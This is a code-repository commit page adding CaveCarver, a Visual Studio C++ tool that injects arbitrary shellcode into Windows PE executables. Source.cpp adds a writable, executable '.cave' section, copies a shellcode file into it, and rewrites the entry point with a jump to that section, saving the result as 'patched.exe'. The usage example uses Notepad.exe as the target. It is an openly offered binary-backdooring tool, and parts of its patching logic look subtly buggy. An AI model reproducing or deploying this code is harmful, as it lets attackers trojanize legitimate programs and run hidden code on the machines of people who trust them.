Projects STRLCPY CaveCarver Commits dc236ca2
🤬
  • ■ ■ ■ ■ ■ ■
    CaveCarver/CaveCarver.vcxproj
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup Label="ProjectConfigurations">
     4 + <ProjectConfiguration Include="Debug|Win32">
     5 + <Configuration>Debug</Configuration>
     6 + <Platform>Win32</Platform>
     7 + </ProjectConfiguration>
     8 + <ProjectConfiguration Include="Release|Win32">
     9 + <Configuration>Release</Configuration>
     10 + <Platform>Win32</Platform>
     11 + </ProjectConfiguration>
     12 + <ProjectConfiguration Include="Debug|x64">
     13 + <Configuration>Debug</Configuration>
     14 + <Platform>x64</Platform>
     15 + </ProjectConfiguration>
     16 + <ProjectConfiguration Include="Release|x64">
     17 + <Configuration>Release</Configuration>
     18 + <Platform>x64</Platform>
     19 + </ProjectConfiguration>
     20 + </ItemGroup>
     21 + <PropertyGroup Label="Globals">
     22 + <VCProjectVersion>16.0</VCProjectVersion>
     23 + <Keyword>Win32Proj</Keyword>
     24 + <ProjectGuid>{a618857f-eb0b-4bf5-af6e-e6b54a69a729}</ProjectGuid>
     25 + <RootNamespace>CaveCarver</RootNamespace>
     26 + <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
     27 + </PropertyGroup>
     28 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
     29 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
     30 + <ConfigurationType>Application</ConfigurationType>
     31 + <UseDebugLibraries>true</UseDebugLibraries>
     32 + <PlatformToolset>v143</PlatformToolset>
     33 + <CharacterSet>Unicode</CharacterSet>
     34 + </PropertyGroup>
     35 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     36 + <ConfigurationType>Application</ConfigurationType>
     37 + <UseDebugLibraries>false</UseDebugLibraries>
     38 + <PlatformToolset>v143</PlatformToolset>
     39 + <WholeProgramOptimization>true</WholeProgramOptimization>
     40 + <CharacterSet>Unicode</CharacterSet>
     41 + </PropertyGroup>
     42 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     43 + <ConfigurationType>Application</ConfigurationType>
     44 + <UseDebugLibraries>true</UseDebugLibraries>
     45 + <PlatformToolset>v143</PlatformToolset>
     46 + <CharacterSet>Unicode</CharacterSet>
     47 + </PropertyGroup>
     48 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
     49 + <ConfigurationType>Application</ConfigurationType>
     50 + <UseDebugLibraries>false</UseDebugLibraries>
     51 + <PlatformToolset>v143</PlatformToolset>
     52 + <WholeProgramOptimization>true</WholeProgramOptimization>
     53 + <CharacterSet>Unicode</CharacterSet>
     54 + </PropertyGroup>
     55 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
     56 + <ImportGroup Label="ExtensionSettings">
     57 + </ImportGroup>
     58 + <ImportGroup Label="Shared">
     59 + </ImportGroup>
     60 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     61 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     62 + </ImportGroup>
     63 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     64 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     65 + </ImportGroup>
     66 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     67 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     68 + </ImportGroup>
     69 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     70 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     71 + </ImportGroup>
     72 + <PropertyGroup Label="UserMacros" />
     73 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     74 + <ClCompile>
     75 + <WarningLevel>Level3</WarningLevel>
     76 + <SDLCheck>true</SDLCheck>
     77 + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     78 + <ConformanceMode>true</ConformanceMode>
     79 + </ClCompile>
     80 + <Link>
     81 + <SubSystem>Console</SubSystem>
     82 + <GenerateDebugInformation>true</GenerateDebugInformation>
     83 + </Link>
     84 + </ItemDefinitionGroup>
     85 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     86 + <ClCompile>
     87 + <WarningLevel>Level3</WarningLevel>
     88 + <FunctionLevelLinking>true</FunctionLevelLinking>
     89 + <IntrinsicFunctions>true</IntrinsicFunctions>
     90 + <SDLCheck>true</SDLCheck>
     91 + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     92 + <ConformanceMode>true</ConformanceMode>
     93 + </ClCompile>
     94 + <Link>
     95 + <SubSystem>Console</SubSystem>
     96 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     97 + <OptimizeReferences>true</OptimizeReferences>
     98 + <GenerateDebugInformation>true</GenerateDebugInformation>
     99 + </Link>
     100 + </ItemDefinitionGroup>
     101 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     102 + <ClCompile>
     103 + <WarningLevel>Level3</WarningLevel>
     104 + <SDLCheck>true</SDLCheck>
     105 + <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     106 + <ConformanceMode>true</ConformanceMode>
     107 + </ClCompile>
     108 + <Link>
     109 + <SubSystem>Console</SubSystem>
     110 + <GenerateDebugInformation>true</GenerateDebugInformation>
     111 + </Link>
     112 + </ItemDefinitionGroup>
     113 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     114 + <ClCompile>
     115 + <WarningLevel>Level3</WarningLevel>
     116 + <FunctionLevelLinking>true</FunctionLevelLinking>
     117 + <IntrinsicFunctions>true</IntrinsicFunctions>
     118 + <SDLCheck>true</SDLCheck>
     119 + <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     120 + <ConformanceMode>true</ConformanceMode>
     121 + </ClCompile>
     122 + <Link>
     123 + <SubSystem>Console</SubSystem>
     124 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     125 + <OptimizeReferences>true</OptimizeReferences>
     126 + <GenerateDebugInformation>true</GenerateDebugInformation>
     127 + </Link>
     128 + </ItemDefinitionGroup>
     129 + <ItemGroup>
     130 + <ClCompile Include="Source.cpp" />
     131 + </ItemGroup>
     132 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
     133 + <ImportGroup Label="ExtensionTargets">
     134 + </ImportGroup>
     135 +</Project>
  • ■ ■ ■ ■ ■ ■
    CaveCarver/CaveCarver.vcxproj.filters
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup>
     4 + <Filter Include="Source Files">
     5 + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
     6 + <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
     7 + </Filter>
     8 + <Filter Include="Header Files">
     9 + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
     10 + <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
     11 + </Filter>
     12 + <Filter Include="Resource Files">
     13 + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
     14 + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
     15 + </Filter>
     16 + </ItemGroup>
     17 + <ItemGroup>
     18 + <ClCompile Include="Source.cpp">
     19 + <Filter>Source Files</Filter>
     20 + </ClCompile>
     21 + </ItemGroup>
     22 +</Project>
  • ■ ■ ■ ■ ■ ■
    CaveCarver/Source.cpp
     1 +#define _CRT_SECURE_NO_WARNINGS
     2 +#include <Windows.h>
     3 +#include <stdio.h>
     4 +#include <fstream>
     5 +#include <vector>
     6 +#include <iostream>
     7 +#include <filesystem>
     8 + 
     9 +DWORD align(DWORD size, DWORD align, DWORD addr) {
     10 + if (!(size % align))
     11 + return addr + size;
     12 + return addr + (size / align + 1) * align;
     13 +}
     14 + 
     15 +BOOL InsertSection(const char* path, std::vector<unsigned char> buffer, UINT32 shellSize)
     16 +{
     17 + HANDLE file = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
     18 + if (file == INVALID_HANDLE_VALUE)
     19 + {
     20 + printf("[-] Failed to open file\n");
     21 + return FALSE;
     22 + }
     23 + 
     24 + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)buffer.data();
     25 + if (dos->e_magic != IMAGE_DOS_SIGNATURE)
     26 + {
     27 + printf("[-] Invalid PE\n");
     28 + return FALSE;
     29 + }
     30 + 
     31 + PIMAGE_FILE_HEADER fileHeader = (PIMAGE_FILE_HEADER)(buffer.data() + dos->e_lfanew + sizeof(ULONG));
     32 + PIMAGE_OPTIONAL_HEADER64 optionalHeader = (PIMAGE_OPTIONAL_HEADER64)(buffer.data() + dos->e_lfanew + sizeof(ULONG) + sizeof(IMAGE_FILE_HEADER));
     33 + PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)(buffer.data() + dos->e_lfanew + sizeof(IMAGE_NT_HEADERS64));
     34 + printf("%x\n", sectionHeader->Characteristics);
     35 + 
     36 + ZeroMemory(&sectionHeader[fileHeader->NumberOfSections], sizeof(IMAGE_SECTION_HEADER));
     37 + CopyMemory(&sectionHeader[fileHeader->NumberOfSections].Name, ".cave", 8);
     38 + //We use 8 bytes for section name,cause it is the maximum allowed section name size
     39 + 
     40 + //lets insert all the required information about our new PE section
     41 + sectionHeader[fileHeader->NumberOfSections].Misc.VirtualSize = align(shellSize, optionalHeader->SectionAlignment, 0);
     42 + sectionHeader[fileHeader->NumberOfSections].VirtualAddress = align(sectionHeader[fileHeader->NumberOfSections - 1].Misc.VirtualSize, optionalHeader->SectionAlignment, sectionHeader[fileHeader->NumberOfSections - 1].VirtualAddress);
     43 + sectionHeader[fileHeader->NumberOfSections].SizeOfRawData = align(shellSize, optionalHeader->FileAlignment, 0);
     44 + sectionHeader[fileHeader->NumberOfSections].PointerToRawData = align(sectionHeader[fileHeader->NumberOfSections - 1].SizeOfRawData, optionalHeader->FileAlignment, sectionHeader[fileHeader->NumberOfSections - 1].PointerToRawData);
     45 + sectionHeader[fileHeader->NumberOfSections].Characteristics = 0xE00000E0;
     46 + 
     47 + /*
     48 + 0xE00000E0 = IMAGE_SCN_MEM_WRITE |
     49 + IMAGE_SCN_CNT_CODE |
     50 + IMAGE_SCN_CNT_UNINITIALIZED_DATA |
     51 + IMAGE_SCN_MEM_EXECUTE |
     52 + IMAGE_SCN_CNT_INITIALIZED_DATA |
     53 + IMAGE_SCN_MEM_READ
     54 + */
     55 + SetFilePointer(file, sectionHeader[fileHeader->NumberOfSections].PointerToRawData + sectionHeader[fileHeader->NumberOfSections].SizeOfRawData, NULL, FILE_BEGIN);
     56 + //end the file right here,on the last section + it's own size
     57 + SetEndOfFile(file);
     58 + //now lets change the size of the image,to correspond to our modifications
     59 + //by adding a new section,the image size is bigger now
     60 + optionalHeader->SizeOfImage = sectionHeader[fileHeader->NumberOfSections].VirtualAddress + sectionHeader[fileHeader->NumberOfSections].Misc.VirtualSize;
     61 + //and we added a new section,so we change the NOS too
     62 + fileHeader->NumberOfSections += 1;
     63 + SetFilePointer(file, 0, NULL, FILE_BEGIN);
     64 + //and finaly,we add all the modifications to the file
     65 + DWORD dw;
     66 + WriteFile(file, buffer.data(), buffer.size(), &dw, NULL);
     67 + CloseHandle(file);
     68 + 
     69 + return TRUE;
     70 +}
     71 + 
     72 +BOOL InjectShellcode(const char* path, std::vector<unsigned char> buffer)
     73 +{
     74 + HANDLE file = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
     75 + if (file == INVALID_HANDLE_VALUE)
     76 + return false;
     77 + DWORD filesize = GetFileSize(file, NULL);
     78 + BYTE* pByte = new BYTE[filesize];
     79 + DWORD dw;
     80 + ReadFile(file, pByte, filesize, &dw, NULL);
     81 + PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)pByte;
     82 + PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(pByte + dos->e_lfanew);
     83 + 
     84 + //since we added a new section,it must be the last section added,cause of the code inside
     85 + //AddSection function,thus we must get to the last section to insert our secret data :)
     86 + PIMAGE_SECTION_HEADER first = IMAGE_FIRST_SECTION(nt);
     87 + PIMAGE_SECTION_HEADER last = first + (nt->FileHeader.NumberOfSections - 1);
     88 + 
     89 + SetFilePointer(file, last->PointerToRawData, NULL, FILE_BEGIN);
     90 + 
     91 + WriteFile(file, buffer.data(), buffer.size(), &dw, 0);
     92 + CloseHandle(file);
     93 + return TRUE;
     94 +}
     95 + 
     96 +BOOL PatchInstruction(const char* path)
     97 +{
     98 + // Open the file
     99 + std::ifstream file(path, std::ios::binary);
     100 + if (!file.is_open()) {
     101 + std::cerr << "Could not open file: " << path << std::endl;
     102 + return FALSE;
     103 + }
     104 + 
     105 + // Get the file size
     106 + file.seekg(0, std::ios::end);
     107 + size_t fileSize = file.tellg();
     108 + file.seekg(0, std::ios::beg);
     109 + 
     110 + // Read the file into a buffer
     111 + char* buffer = new char[fileSize];
     112 + file.read(buffer, fileSize);
     113 + 
     114 + // Get the DOS header
     115 + IMAGE_DOS_HEADER* dosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(buffer);
     116 + if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
     117 + std::cerr << "Invalid DOS signature." << std::endl;
     118 + return FALSE;
     119 + }
     120 + 
     121 + // Get the NT headers
     122 + IMAGE_NT_HEADERS64* ntHeader = reinterpret_cast<IMAGE_NT_HEADERS64*>(buffer + dosHeader->e_lfanew);
     123 + if (ntHeader->Signature != IMAGE_NT_SIGNATURE) {
     124 + std::cerr << "Invalid NT signature." << std::endl;
     125 + return FALSE;
     126 + }
     127 + 
     128 + // Get the section headers
     129 + IMAGE_SECTION_HEADER* sectionHeader = IMAGE_FIRST_SECTION(ntHeader);
     130 + 
     131 + // Find the .cave section
     132 + IMAGE_SECTION_HEADER* caveSectionHeader = nullptr;
     133 + for (int i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) {
     134 + if (strncmp(reinterpret_cast<char*>(sectionHeader[i].Name), ".cave", IMAGE_SIZEOF_SHORT_NAME) == 0) {
     135 + caveSectionHeader = &sectionHeader[i];
     136 + break;
     137 + }
     138 + }
     139 + 
     140 + if (caveSectionHeader == nullptr) {
     141 + std::cerr << "Could not find .cave section." << std::endl;
     142 + return FALSE;
     143 + }
     144 + 
     145 + // Get the RVA of the entry point
     146 + DWORD entryPointRva = ntHeader->OptionalHeader.AddressOfEntryPoint;
     147 + printf("[+] Entry point: 0x%x\n", entryPointRva);
     148 + 
     149 + // Calculate the file offset of the entry point
     150 + DWORD entryPointOffset = 0;
     151 + for (int i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) {
     152 + if (entryPointRva >= sectionHeader[i].VirtualAddress &&
     153 + entryPointRva < sectionHeader[i].VirtualAddress + sectionHeader[i].Misc.VirtualSize) {
     154 + entryPointOffset = sectionHeader[i].PointerToRawData + (entryPointRva - sectionHeader[i].VirtualAddress);
     155 + break;
     156 + }
     157 + }
     158 + 
     159 + if (entryPointOffset == 0) {
     160 + std::cerr << "Could not find file offset of entry point." << std::endl;
     161 + return 1;
     162 + }
     163 + 
     164 + // Calculate the address of the jump target
     165 + DWORD jumpTargetAddress = ntHeader->OptionalHeader.ImageBase + caveSectionHeader->VirtualAddress;
     166 + DWORD jumpOffset = jumpTargetAddress - (ntHeader->OptionalHeader.ImageBase + entryPointRva + sizeof(5));
     167 + 
     168 + // Patch the entry point with a jump instruction to the .cave section
     169 + unsigned char bytes[5];
     170 + bytes[0] = (jumpOffset & 0xFF000000) >> 24;
     171 + bytes[1] = (jumpOffset & 0x00FF0000) >> 16;
     172 + bytes[2] = (jumpOffset & 0x0000FF00) >> 8;
     173 + bytes[3] = jumpOffset & 0x000000FF;
     174 + bytes[4] = 0xE9;
     175 + 
     176 + std::reverse(bytes, bytes + sizeof(bytes));
     177 + 
     178 + printf("[+] Patch shellcode: ");
     179 + for (int i = 0; i < sizeof(bytes); i++)
     180 + printf("0x%x ", bytes[i]);
     181 + printf("\n");
     182 + 
     183 + memcpy(buffer + entryPointOffset, bytes, sizeof(bytes));
     184 + memcpy(buffer + entryPointOffset + sizeof(bytes), &jumpOffset, sizeof(jumpOffset));
     185 + 
     186 + std::cout << "[+] Patched entrypoint" << std::endl;
     187 + 
     188 + // Save the patched file to disk
     189 + std::ofstream outputFile("patched.exe", std::ios::binary);
     190 + if (!outputFile.is_open()) {
     191 + std::cerr << "Could not create output file." << std::endl;
     192 + return 1;
     193 + }
     194 + outputFile.write(buffer, fileSize);
     195 + 
     196 + // Cleanup
     197 + delete[] buffer;
     198 + 
     199 + std::cout << "[+] Patched file saved to 'patched.exe'" << std::endl;
     200 + 
     201 + return TRUE;
     202 +}
     203 + 
     204 +VOID Helper()
     205 +{
     206 + printf("\n");
     207 + printf("Usage:\n");
     208 + printf("CodeCaver.exe executable shellcode\n\n");
     209 + printf("Example:\n");
     210 + printf("CodeCaver.exe C:\\Notepad.exe C:\\Users\\user\\shellcode.bin\n\n");
     211 +}
     212 + 
     213 +int main(int argc, char* argv[])
     214 +{
     215 + if (argc < 3)
     216 + {
     217 + printf("[-] Invalid paramters\n");
     218 + Helper();
     219 + return -1;
     220 + }
     221 + 
     222 + const char* exePath = argv[1];
     223 + const char* shellPath = argv[2];
     224 + 
     225 + std::ifstream exe(exePath, std::ios::binary);
     226 + std::vector<unsigned char> exeBuffer(std::istreambuf_iterator<char>(exe), {});
     227 + exe.close();
     228 + 
     229 + std::ifstream shell(shellPath, std::ios::binary);
     230 + std::vector<unsigned char> shellBuffer(std::istreambuf_iterator<char>(shell), {});
     231 + shell.close();
     232 + 
     233 + printf("[+] Exe size: %d\n", exeBuffer.size());
     234 + printf("[+] Shellcode size: %d\n", shellBuffer.size());
     235 + 
     236 + if (!InsertSection(exePath, exeBuffer, shellBuffer.size()))
     237 + return -1;
     238 + 
     239 + if (!InjectShellcode(exePath, shellBuffer))
     240 + return -1;
     241 + 
     242 + if (!PatchInstruction(exePath))
     243 + return -1;
     244 + 
     245 + printf("[+] Success!\n");
     246 +}
  • ■ ■ ■ ■ ■ ■
    CaveCarver.sln
     1 +
     2 +Microsoft Visual Studio Solution File, Format Version 12.00
     3 +# Visual Studio Version 17
     4 +VisualStudioVersion = 17.3.32901.215
     5 +MinimumVisualStudioVersion = 10.0.40219.1
     6 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CaveCarver", "CaveCarver\CaveCarver.vcxproj", "{A618857F-EB0B-4BF5-AF6E-E6B54A69A729}"
     7 +EndProject
     8 +Global
     9 + GlobalSection(SolutionConfigurationPlatforms) = preSolution
     10 + Debug|x64 = Debug|x64
     11 + Debug|x86 = Debug|x86
     12 + Release|x64 = Release|x64
     13 + Release|x86 = Release|x86
     14 + EndGlobalSection
     15 + GlobalSection(ProjectConfigurationPlatforms) = postSolution
     16 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Debug|x64.ActiveCfg = Debug|x64
     17 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Debug|x64.Build.0 = Debug|x64
     18 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Debug|x86.ActiveCfg = Debug|Win32
     19 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Debug|x86.Build.0 = Debug|Win32
     20 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Release|x64.ActiveCfg = Release|x64
     21 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Release|x64.Build.0 = Release|x64
     22 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Release|x86.ActiveCfg = Release|Win32
     23 + {A618857F-EB0B-4BF5-AF6E-E6B54A69A729}.Release|x86.Build.0 = Release|Win32
     24 + EndGlobalSection
     25 + GlobalSection(SolutionProperties) = preSolution
     26 + HideSolutionNode = FALSE
     27 + EndGlobalSection
     28 + GlobalSection(ExtensibilityGlobals) = postSolution
     29 + SolutionGuid = {20B8D1E1-471D-4F41-A25C-7E02F79FD62E}
     30 + EndGlobalSection
     31 +EndGlobal
     32 + 
Please wait...
Page is in error, reload to recover